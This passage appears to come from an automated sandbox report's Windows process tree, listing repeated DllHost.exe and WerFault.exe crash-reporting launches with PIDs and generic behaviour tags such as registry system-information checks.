C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:4040

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 4040 -s 400
2⤵
- Checks processor information in registry
PID:3028

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:3148

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 3148 -s 388
2⤵
PID:848

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 4072 -s 680
1⤵
- Checks processor information in registry
PID:2948

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}
1⤵
PID:2612

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 2612 -s 684
2⤵
PID:4780

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 4384 -s 488
1⤵
PID:4924

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:2908

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 2908 -s 400
2⤵
PID:2776

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}
1⤵
PID:352

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 352 -s 692
2⤵
PID:4544

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:3180

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 3180 -s 468
2⤵
- Checks processor information in registry
PID:2096

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}
1⤵
PID:2040

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 2040 -s 492
2⤵
PID:3584

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:1100

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 1100 -s 492
2⤵
- Checks processor information in registry
- Enumerates system info in registry
PID:4844

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}
1⤵
PID:2264

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 2264 -s 492
2⤵
PID:4432

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}
1⤵
PID:2916

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 2916 -s 664
2⤵
PID:3120

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:3940

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 3940 -s 472
2⤵
PID:2328

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:756

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 756 -s 412
2⤵
- Checks processor information in registry
PID:1584

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 656 -s 656
1⤵
PID:3404

C:\Windows\system32\backgroundTaskHost.exe
"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
1⤵
- Modifies registry class
PID:3372

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}
1⤵
PID:1320

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 1320 -s 420
2⤵
- Checks processor information in registry
PID:2144

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:4128

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 4128 -s 420
2⤵
- Checks processor information in registry
- Enumerates system info in registry
PID:1200

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:1348

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 1348 -s 488
2⤵
- Checks processor information in registry
PID:4632

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:3148

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 3148 -s 788
2⤵
PID:2456

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}
1⤵
PID:1232

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 1232 -s 680
2⤵
- Enumerates system info in registry
PID:2328

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:1560

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 1560 -s 780
2⤵
- Checks processor information in registry
- Enumerates system info in registry
PID:4988

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}
1⤵
PID:3896

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 3896 -s 420
2⤵
- Checks processor information in registry
PID:472

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:4224

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 4224 -s 816
2⤵
PID:456

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}
1⤵
PID:2256

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 2256 -s 680
2⤵
PID:4284

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:5116

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 5116 -s 724
2⤵
- Checks processor information in registry
- Enumerates system info in registry
PID:3224

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}
1⤵
PID:4572

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 4572 -s 680
2⤵
PID:4120

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:2044

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 2044 -s 772
2⤵
PID:2700

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}
1⤵
- Checks processor information in registry
PID:2776

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 2776 -s 452
2⤵
- Enumerates system info in registry
PID:4500

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:4200

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 4200 -s 776
2⤵
- Enumerates system info in registry
PID:656

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}
1⤵
PID:3948

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 3948 -s 656
2⤵
PID:4048

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:1404

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 1404 -s 724
2⤵
- Checks processor information in registry
- Enumerates system info in registry
PID:4464

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}
1⤵
PID:4576

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 4576 -s 384
2⤵
- Checks processor information in registry
- Enumerates system info in registry
PID:4424

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:1956

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 1956 -s 476
2⤵
PID:1180

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}
1⤵
PID:3892

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 3892 -s 684
2⤵
- Checks processor information in registry
PID:2824

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:3552

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 3552 -s 772
2⤵
- Enumerates system info in registry
PID:4328

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:2572

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 2572 -s 388
2⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Enumerates system info in registry
PID:2420

C:\Windows\system32\backgroundTaskHost.exe
"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
1⤵
PID:2412

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:2652

C:\Windows\system32\backgroundTaskHost.exe
"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:ShellFeedsUI.AppXnj65k2d1a1rnztt2t2nng5ctmk3e76pn.mca
1⤵
PID:1388

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}
1⤵
PID:3968

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 3968 -s 400
2⤵
- Checks processor information in registry
PID:396

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k WerSvcGroup
1⤵
PID:5088

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 408 -p 3968 -ip 3968
2⤵
PID:2284

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 404 -p 4072 -ip 4072
2⤵
PID:184

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 568 -p 4332 -ip 4332
2⤵
PID:2948

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 424 -p 2288 -ip 2288
2⤵
PID:2612

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 568 -p 4808 -ip 4808
2⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:4700

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 572 -p 4256 -ip 4256
2⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:4156

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 584 -p 3524 -ip 3524
2⤵
PID:3552

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 624 -p 2100 -ip 2100
2⤵
PID:184

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 516 -p 4152 -ip 4152
2⤵
PID:1576

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 516 -p 4952 -ip 4952
2⤵
PID:4132

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 664 -p 3848 -ip 3848
2⤵
PID:4364

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 680 -p 1152 -ip 1152
2⤵
PID:4240

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 676 -p 764 -ip 764
2⤵
PID:5108

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 588 -p 3400 -ip 3400
2⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:2280

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 612 -p 4072 -ip 4072
2⤵
PID:4648

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 608 -p 2016 -ip 2016
2⤵
PID:4152

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 584 -p 3128 -ip 3128
2⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:860

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 644 -p 3048 -ip 3048
2⤵
PID:4424

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 588 -p 3828 -ip 3828
2⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:568

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 624 -p 2964 -ip 2964
2⤵
PID:1844

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 568 -p 4692 -ip 4692
2⤵
PID:1908

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 652 -p 4492 -ip 4492
2⤵
PID:4872

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 468 -p 2504 -ip 2504
2⤵
PID:472

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 472 -p 2976 -ip 2976
2⤵
PID:4752

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 652 -p 3292 -ip 3292
2⤵
PID:4336

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 584 -p 2996 -ip 2996
2⤵
PID:4924

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 568 -p 1228 -ip 1228
2⤵
PID:2652

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 508 -p 3196 -ip 3196
2⤵
PID:1060

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 516 -p 4240 -ip 4240
2⤵
PID:1512

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 564 -p 3248 -ip 3248
2⤵
PID:4384

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 468 -p 2592 -ip 2592
2⤵
PID:4208

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 504 -p 2740 -ip 2740
2⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:4432

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 576 -p 748 -ip 748
2⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:3516

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 468 -p 1844 -ip 1844
2⤵
PID:2396

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 584 -p 4152 -ip 4152
2⤵
PID:2980

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 512 -p 4336 -ip 4336
2⤵
PID:2516

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 632 -p 3048 -ip 3048
2⤵
PID:1108

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 632 -p 4648 -ip 4648
2⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:2828

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 600 -p 3028 -ip 3028
2⤵
PID:3656

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 612 -p 1404 -ip 1404
2⤵
PID:1596

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 468 -p 1200 -ip 1200
2⤵
PID:1060

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 504 -p 560 -ip 560
2⤵
PID:3576

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 568 -p 5084 -ip 5084
2⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:2520

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 596 -p 3624 -ip 3624
2⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:804

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 468 -p 3068 -ip 3068
2⤵
PID:1484

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 576 -p 3928 -ip 3928
2⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:1320

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 468 -p 3692 -ip 3692
2⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:4252

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 384 -p 4788 -ip 4788
2⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:4208

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 384 -p 4124 -ip 4124
2⤵
PID:940

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 516 -p 528 -ip 528
2⤵
PID:4532

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 588 -p 3036 -ip 3036
2⤵
PID:4648

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 652 -p 4824 -ip 4824
2⤵
PID:1564

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 584 -p 2976 -ip 2976
2⤵
PID:2752

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 572 -p 2396 -ip 2396
2⤵
PID:4932

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 548 -p 1688 -ip 1688
2⤵
PID:3540

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 4072 -s 808
1⤵
- Checks processor information in registry
PID:2292

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}
1⤵
PID:4332

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 4332 -s 400
2⤵
- Enumerates system info in registry
PID:1412

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:2288

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 2288 -s 400
2⤵
PID:3960

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{7966B4D8-4FDC-4126-A10B-39A3209AD251}
1⤵
PID:4808

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 4808 -s 452
2⤵
PID:3208

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}
1⤵
PID:4256

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 4256 -s 368
2⤵
- Checks processor information in registry
PID:4668

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}
1⤵
PID:3524

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 3524 -s 664
2⤵
- Checks processor information in registry
- Enumerates system info in registry
PID:444

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 2100 -s 368
1⤵
PID:748

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:4952

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 4952 -s 792
2⤵
PID:2468

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 4152 -s 656
1⤵
PID:560

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}
1⤵
PID:3848

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 3848 -s 664
2⤵
PID:3864

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:1152

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 1152 -s 472
2⤵
PID:4092

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:764

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 764 -s 368
2⤵
PID:1812

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:3400

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 3400 -s 784
2⤵
- Enumerates system info in registry
PID:4540

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}
1⤵
PID:4072

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 4072 -s 680
2⤵
PID:2336

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 2016 -s 720
1⤵
- Checks processor information in registry
- Enumerates system info in registry
PID:4248

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 3128 -s 500
1⤵
PID:3540

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:3828

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 3828 -s 720
2⤵
- Enumerates system info in registry
PID:852

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 3048 -s 656
1⤵
PID:4008

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:4692

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 4692 -s 804
2⤵
PID:2096

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 2964 -s 656
1⤵
PID:1056

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}
1⤵
PID:4492

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 4492 -s 484
2⤵
- Enumerates system info in registry
PID:4504

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:2504

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 2504 -s 712
2⤵
- Enumerates system info in registry
PID:5024

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}
1⤵
PID:3292

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 3292 -s 656
2⤵
- Checks processor information in registry
- Enumerates system info in registry
PID:4896

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 2976 -s 420
1⤵
PID:2044

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}
1⤵
PID:2996

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 2996 -s 656
2⤵
PID:3624

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:1228

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 1228 -s 780
2⤵
PID:4920

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}
1⤵
PID:3196

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 3196 -s 492
2⤵
PID:3812

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:4240

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 4240 -s 420
2⤵
PID:3000

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}
1⤵
PID:3248

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 3248 -s 492
2⤵
- Checks processor information in registry
PID:224

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:2592

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 2592 -s 772
2⤵
PID:4032

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}
1⤵
PID:2740

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 2740 -s 496
2⤵
PID:4232

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
- Checks processor information in registry
PID:748

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 748 -s 636
2⤵
- Enumerates system info in registry
PID:1636

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}
1⤵
PID:1844

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 1844 -s 664
2⤵
- Checks processor information in registry
PID:988

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:4152

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 4152 -s 420
2⤵
- Checks processor information in registry
- Enumerates system info in registry
PID:2776

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}
1⤵
PID:4336

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 4336 -s 492
2⤵
- Checks processor information in registry
- Enumerates system info in registry
PID:184

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 3048 -s 720
1⤵
- Checks processor information in registry
- Enumerates system info in registry
PID:3952

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:3028

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 3028 -s 288
2⤵
- Enumerates system info in registry
PID:3896

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 4648 -s 660
1⤵
PID:4812

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 1404 -s 420
1⤵
PID:4644

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}
1⤵
PID:1200

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 1200 -s 468
2⤵
- Checks processor information in registry
- Enumerates system info in registry
PID:2376

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 560 -s 772
1⤵
- Enumerates system info in registry
PID:4184

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}
1⤵
PID:5084

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 5084 -s 664
2⤵
PID:496

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
- Checks processor information in registry
- Enumerates system info in registry
PID:3624

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 3624 -s 780
2⤵
- Checks processor information in registry
- Enumerates system info in registry
PID:1512

C:\Windows\system32\DllHost.exe
